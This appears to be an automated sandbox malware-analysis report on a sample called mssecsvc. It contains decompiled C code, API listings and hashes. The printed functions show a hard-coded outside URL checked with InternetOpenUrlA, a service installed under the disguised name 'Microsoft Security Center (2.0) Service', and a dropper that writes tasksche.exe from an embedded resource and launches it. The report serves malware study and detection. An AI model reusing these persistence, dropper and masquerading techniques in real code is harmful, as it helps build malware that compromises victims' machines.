                                                                                                                                                0x00407e7a
                                                                                                                                                0x00407e82
                                                                                                                                                0x00407e8b
                                                                                                                                                0x00407e95
                                                                                                                                                0x00407e9b
                                                                                                                                                0x00407e9f
                                                                                                                                                0x00407ea8
                                                                                                                                                0x00407eb0
                                                                                                                                                0x00407ebc
                                                                                                                                                0x00407ed3
                                                                                                                                                0x00407edb
                                                                                                                                                0x00407ee0
                                                                                                                                                0x00407ee8
                                                                                                                                                0x00407ef0
                                                                                                                                                0x00407ef7
                                                                                                                                                0x00407f02
                                                                                                                                                0x00407f02
                                                                                                                                                0x00407ef0
                                                                                                                                                0x00407e4e
                                                                                                                                                0x00407db3
                                                                                                                                                0x00407da1
                                                                                                                                                0x00407d8e
                                                                                                                                                0x00407d7e
                                                                                                                                                0x00407d5b
                                                                                                                                                0x00407d4f
                                                                                                                                                0x00407d43
                                                                                                                                                0x00407f14

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6F61FB10,?,00000000), ref: 00407CEF
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
                                                                                                                                                • FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
                                                                                                                                                • LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
                                                                                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
                                                                                                                                                • sprintf.MSVCRT ref: 00407E01
                                                                                                                                                • sprintf.MSVCRT ref: 00407E18
                                                                                                                                                • MoveFileExA.KERNEL32 ref: 00407E2C
                                                                                                                                                • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000004,00000000), ref: 00407E43
                                                                                                                                                • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00407E61
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00407E68
                                                                                                                                                • CreateProcessA.KERNELBASE ref: 00407EE8
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00407EF7
                                                                                                                                                • CloseHandle.KERNEL32(08000000), ref: 00407F02
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.348205841.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000008.00000002.348172576.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348323466.0000000000409000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348364015.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348385493.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348414559.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348635063.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348690021.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.350875392.0000000000A6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.350892977.0000000000A6C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.350925815.0000000000A71000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProcResource$CloseFileHandle$CreateFindsprintf$ChangeLoadLockModuleMoveNotificationProcessSizeofWrite
                                                                                                                                                • String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
                                                                                                                                                • API String ID: 1541710770-1507730452
                                                                                                                                                • Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                                                                                                                                                • Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
                                                                                                                                                • Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                                                                                                                                                • Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00409A16 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                C-Code - Quality: 71%
                                                                                                                                                			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x40a1a0);
				_push(0x409ba2);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x70f894 =  *0x70f894 | 0xffffffff;
				 *0x70f898 =  *0x70f898 | 0xffffffff;
				 *(__p__fmode()) =  *0x70f88c;
				 *(__p__commode()) =  *0x70f888;
				 *0x70f890 = _adjust_fdiv;
				_t27 = E00409BA1( *_adjust_fdiv);
				_t61 =  *0x431410; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E00409B9E);
				}
				E00409B8C(_t27);
				_push(0x40b010);
				_push(0x40b00c);
				L00409B86();
				_v112 =  *0x70f884;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
				_push(0x40b008);
				_push(0x40b000); // executed
				L00409B86(); // executed
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t55);
				_push(0);
				_push(GetModuleHandleA(0));
				_t40 = E00408140();
				_v108 = _t40;
				exit(_t40); // executed
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L00409B80();
				return _t41;
			}
























                                                                                                                                                0x00409a19
                                                                                                                                                0x00409a1b
                                                                                                                                                0x00409a20
                                                                                                                                                0x00409a2b
                                                                                                                                                0x00409a2c
                                                                                                                                                0x00409a39
                                                                                                                                                0x00409a3e
                                                                                                                                                0x00409a43
                                                                                                                                                0x00409a4a
                                                                                                                                                0x00409a51
                                                                                                                                                0x00409a64
                                                                                                                                                0x00409a72
                                                                                                                                                0x00409a7b
                                                                                                                                                0x00409a80
                                                                                                                                                0x00409a85
                                                                                                                                                0x00409a8b
                                                                                                                                                0x00409a92
                                                                                                                                                0x00409a98
                                                                                                                                                0x00409a99
                                                                                                                                                0x00409a9e
                                                                                                                                                0x00409aa3
                                                                                                                                                0x00409aa8
                                                                                                                                                0x00409ab2
                                                                                                                                                0x00409acb
                                                                                                                                                0x00409ad1
                                                                                                                                                0x00409ad6
                                                                                                                                                0x00409adb
                                                                                                                                                0x00409ae8
                                                                                                                                                0x00409aea
                                                                                                                                                0x00409af0
                                                                                                                                                0x00409b2c
                                                                                                                                                0x00409b31
                                                                                                                                                0x00409b32
                                                                                                                                                0x00409b32
                                                                                                                                                0x00409af2
                                                                                                                                                0x00409af2
                                                                                                                                                0x00409af2
                                                                                                                                                0x00409af3
                                                                                                                                                0x00409af6
                                                                                                                                                0x00409af8
                                                                                                                                                0x00409b03
                                                                                                                                                0x00409b05
                                                                                                                                                0x00409b05
                                                                                                                                                0x00409b06
                                                                                                                                                0x00409b06
                                                                                                                                                0x00409b03
                                                                                                                                                0x00409b09
                                                                                                                                                0x00409b0d
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00409b13
                                                                                                                                                0x00409b1a
                                                                                                                                                0x00409b24
                                                                                                                                                0x00409b39
                                                                                                                                                0x00409b26
                                                                                                                                                0x00409b26
                                                                                                                                                0x00409b26
                                                                                                                                                0x00409b3a
                                                                                                                                                0x00409b3b
                                                                                                                                                0x00409b3c
                                                                                                                                                0x00409b44
                                                                                                                                                0x00409b45
                                                                                                                                                0x00409b4a
                                                                                                                                                0x00409b4e
                                                                                                                                                0x00409b54
                                                                                                                                                0x00409b59
                                                                                                                                                0x00409b5b
                                                                                                                                                0x00409b5e
                                                                                                                                                0x00409b5f
                                                                                                                                                0x00409b60
                                                                                                                                                0x00409b67

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.348323466.0000000000409000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000008.00000002.348172576.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348205841.0000000000401000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348364015.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348385493.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348414559.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348635063.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348690021.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.350875392.0000000000A6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.350892977.0000000000A6C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.350925815.0000000000A71000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 801014965-0
                                                                                                                                                • Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                                                                                                                                                • Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
                                                                                                                                                • Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                                                                                                                                                • Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00408140 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46networkCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                			E00408140() {
				char* _v1;
				char* _v3;
				char* _v7;
				char* _v11;
				char* _v15;
				char* _v19;
				char* _v23;
				void _v80;
				char _v100;
				char* _t12;
				void* _t13;
				void* _t27;

				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 0xe << 2);
				asm("movsb");
				_v23 = _t12;
				_v19 = _t12;
				_v15 = _t12;
				_v11 = _t12;
				_v7 = _t12;
				_v3 = _t12;
				_v1 = _t12;
				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
				_t27 = _t13;
				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
				InternetCloseHandle(_t27); // executed
				InternetCloseHandle(0);
				E00408090();
				return 0;
			}















                                                                                                                                                0x00408155
                                                                                                                                                0x00408157
                                                                                                                                                0x00408158
                                                                                                                                                0x0040815c
                                                                                                                                                0x00408160
                                                                                                                                                0x00408164
                                                                                                                                                0x00408168
                                                                                                                                                0x0040816c
                                                                                                                                                0x00408177
                                                                                                                                                0x0040817b
                                                                                                                                                0x0040818e
                                                                                                                                                0x00408194
                                                                                                                                                0x004081a7
                                                                                                                                                0x004081ab
                                                                                                                                                0x004081ad
                                                                                                                                                0x004081b9

                                                                                                                                                APIs
                                                                                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
                                                                                                                                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 004081A7
                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 004081AB
                                                                                                                                                  • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                                                                                                                                                  • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
                                                                                                                                                Strings
                                                                                                                                                • http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.348205841.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000008.00000002.348172576.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348323466.0000000000409000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348364015.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348385493.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348414559.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348635063.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348690021.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.350875392.0000000000A6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.350892977.0000000000A6C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.350925815.0000000000A71000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
                                                                                                                                                • String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                                                                                                                                                • API String ID: 774561529-2942426231
                                                                                                                                                • Opcode ID: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                                                                                                                                                • Instruction ID: cdf7c9b464921ed547f6e9cf97b0948ff8b518ee0850ecae1f57fc3afa3cefd0
                                                                                                                                                • Opcode Fuzzy Hash: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                                                                                                                                                • Instruction Fuzzy Hash: D20186719543106EE310DF348C05B6BBBE9EF85710F01082EF984F7280E6B59804876B
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Non-executed Functions

                                                                                                                                                Function 00407C40 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54serviceCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00407C40() {
				char _v260;
				void* _t15;
				void* _t17;

				sprintf( &_v260, "%s -m security", 0x70f760);
				_t15 = OpenSCManagerA(0, 0, 0xf003f);
				if(_t15 == 0) {
					return 0;
				} else {
					_t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
					if(_t17 != 0) {
						StartServiceA(_t17, 0, 0);
						CloseServiceHandle(_t17);
					}
					CloseServiceHandle(_t15);
					return 0;
				}
			}






                                                                                                                                                0x00407c56
                                                                                                                                                0x00407c6e
                                                                                                                                                0x00407c72
                                                                                                                                                0x00407cd3
                                                                                                                                                0x00407c74
                                                                                                                                                0x00407ca7
                                                                                                                                                0x00407cab
                                                                                                                                                0x00407cb2
                                                                                                                                                0x00407cb9
                                                                                                                                                0x00407cb9
                                                                                                                                                0x00407cbc
                                                                                                                                                0x00407cc9
                                                                                                                                                0x00407cc9

                                                                                                                                                APIs
                                                                                                                                                • sprintf.MSVCRT ref: 00407C56
                                                                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
                                                                                                                                                • CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6F61FB10,00000000), ref: 00407C9B
                                                                                                                                                • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.348205841.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000008.00000002.348172576.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348323466.0000000000409000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348364015.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348385493.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348414559.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348635063.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348690021.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.350875392.0000000000A6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.350892977.0000000000A6C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.350925815.0000000000A71000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
                                                                                                                                                • String ID: %s -m security$Microsoft Security Center (2.0) Service$mssecsvc2.0
                                                                                                                                                • API String ID: 3340711343-4063779371
                                                                                                                                                • Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                                                                                                                                                • Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
                                                                                                                                                • Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                                                                                                                                                • Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00408090 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49serviceCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                			E00408090() {
				char* _v4;
				char* _v8;
				intOrPtr _v12;
				struct _SERVICE_TABLE_ENTRY _v16;
				long _t6;
				void* _t19;
				void* _t22;

				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
				__imp____p___argc();
				_t26 =  *_t6 - 2;
				if( *_t6 >= 2) {
					_t19 = OpenSCManagerA(0, 0, 0xf003f);
					__eflags = _t19;
					if(_t19 != 0) {
						_t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);
						__eflags = _t22;
						if(_t22 != 0) {
							E00407FA0(_t22, 0x3c);
							CloseServiceHandle(_t22);
						}
						CloseServiceHandle(_t19);
					}
					_v16 = "mssecsvc2.0";
					_v12 = 0x408000;
					_v8 = 0;
					_v4 = 0;
					return StartServiceCtrlDispatcherA( &_v16);
				} else {
					return E00407F20(_t26);
				}
			}










                                                                                                                                                0x0040809f
                                                                                                                                                0x004080a5
                                                                                                                                                0x004080ab
                                                                                                                                                0x004080ae
                                                                                                                                                0x004080c9
                                                                                                                                                0x004080cb
                                                                                                                                                0x004080cd
                                                                                                                                                0x004080e8
                                                                                                                                                0x004080ea
                                                                                                                                                0x004080ec
                                                                                                                                                0x004080f1
                                                                                                                                                0x004080fa
                                                                                                                                                0x004080fa
                                                                                                                                                0x004080fd
                                                                                                                                                0x00408100
                                                                                                                                                0x00408105
                                                                                                                                                0x0040810e
                                                                                                                                                0x00408116
                                                                                                                                                0x0040811e
                                                                                                                                                0x00408130
                                                                                                                                                0x004080b0
                                                                                                                                                0x004080b8
                                                                                                                                                0x004080b8

                                                                                                                                                APIs
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                                                                                                                                                • __p___argc.MSVCRT ref: 004080A5
                                                                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
                                                                                                                                                • OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6F61FB10,00000000,?,004081B2), ref: 004080DC
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
                                                                                                                                                • StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.348205841.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000008.00000002.348172576.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348323466.0000000000409000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348364015.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348385493.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348414559.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348635063.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.348690021.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.350875392.0000000000A6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.350892977.0000000000A6C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                • Associated: 00000008.00000002.350925815.0000000000A71000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
                                                                                                                                                • String ID: mssecsvc2.0
                                                                                                                                                • API String ID: 4274534310-3729025388
                                                                                                                                                • Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                                                                                                                                                • Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
                                                                                                                                                • Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                                                                                                                                                • Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:58.7%
                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                Signature Coverage:0%
                                                                                                                                                Total number of Nodes:7
                                                                                                                                                Total number of Limit Nodes:1

                                                                                                                                                Callgraph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                • Opacity -> Relevance
                                                                                                                                                • Disassembly available
                                                                                                                                                callgraph 0 Function_00409BA1 1 Function_00A6B0B4 2 Function_00409A16 2->0 2->1 3 Function_00409B8C 2->3 4 Function_00409B9E

                                                                                                                                                Executed Functions

                                                                                                                                                Function 00409A16 Relevance: 10.6, APIs: 7, Instructions: 113COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 0 409a16-409a8b __set_app_type __p__fmode __p__commode call 409ba1 3 409a99-409af0 call 409b8c _initterm __getmainargs _initterm 0->3 4 409a8d-409a98 __setusermatherr 0->4 7 409af2-409afa 3->7 8 409b2c-409b2f 3->8 4->3 11 409b00-409b03 7->11 12 409afc-409afe 7->12 9 409b31-409b35 8->9 10 409b09-409b0d 8->10 9->8 14 409b13-a6b300 10->14 15 409b0f-409b11 10->15 11->10 13 409b05-409b06 11->13 12->7 12->11 13->10 17 a6b304 14->17 15->13 15->14 17->17 18 a6b306-a6b30e call a6b0b4 17->18 20 a6b313 18->20 21 a6b314-a6b316 20->21 21->21 22 a6b318-a6b326 21->22 22->20 23 a6b32c-a6b332 22->23 23->20 24 a6b334-a6b349 23->24 24->20 25 a6b34b-a6b34e 24->25
                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                			_entry_(void* __ebx, char* __edx, void* _a37) {
				char* _v8;
				intOrPtr _v28;
				char* _v52;
				intOrPtr _v84;
				char _v96;
				int _v100;
				char** _v104;
				intOrPtr _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				void* _v136;
				short _v152;
				char _v184;
				void* __esi;
				void* __ebp;
				void* _t37;
				intOrPtr _t46;
				char* _t47;
				int _t50;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t58;
				void* _t61;
				void* _t66;
				void* _t67;
				void* _t68;
				char* _t71;
				void* _t74;
				intOrPtr* _t79;
				intOrPtr _t84;
				intOrPtr _t85;
				intOrPtr* _t86;
				void* _t88;
				intOrPtr _t90;
				void* _t98;
				void* _t101;

				_t71 = __edx;
				_push(0xffffffff);
				_push(0x40a1a0);
				_push(0x409ba2);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t84;
				_t85 = _t84 - 0x68;
				_push(__ebx);
				_push(_t74);
				_v28 = _t85;
				_v8 = 0;
				__set_app_type(2);
				 *0x70f894 =  *0x70f894 | 0xffffffff;
				 *0x70f898 =  *0x70f898 | 0xffffffff;
				 *(__p__fmode()) =  *0x70f88c;
				 *(__p__commode()) =  *0x70f888;
				 *0x70f890 = _adjust_fdiv;
				_t37 = E00409BA1( *_adjust_fdiv);
				_t90 =  *0x431410; // 0x1
				if(_t90 == 0) {
					__setusermatherr(E00409B9E);
				}
				E00409B8C(_t37);
				_push(0x40b010);
				_push(0x40b00c);
				L00409B86();
				_v112 =  *0x70f884;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
				_push(0x40b008);
				_push(0x40b000); // executed
				L00409B86(); // executed
				_t86 = _t85 + 0x24;
				_t79 =  *_acmdln;
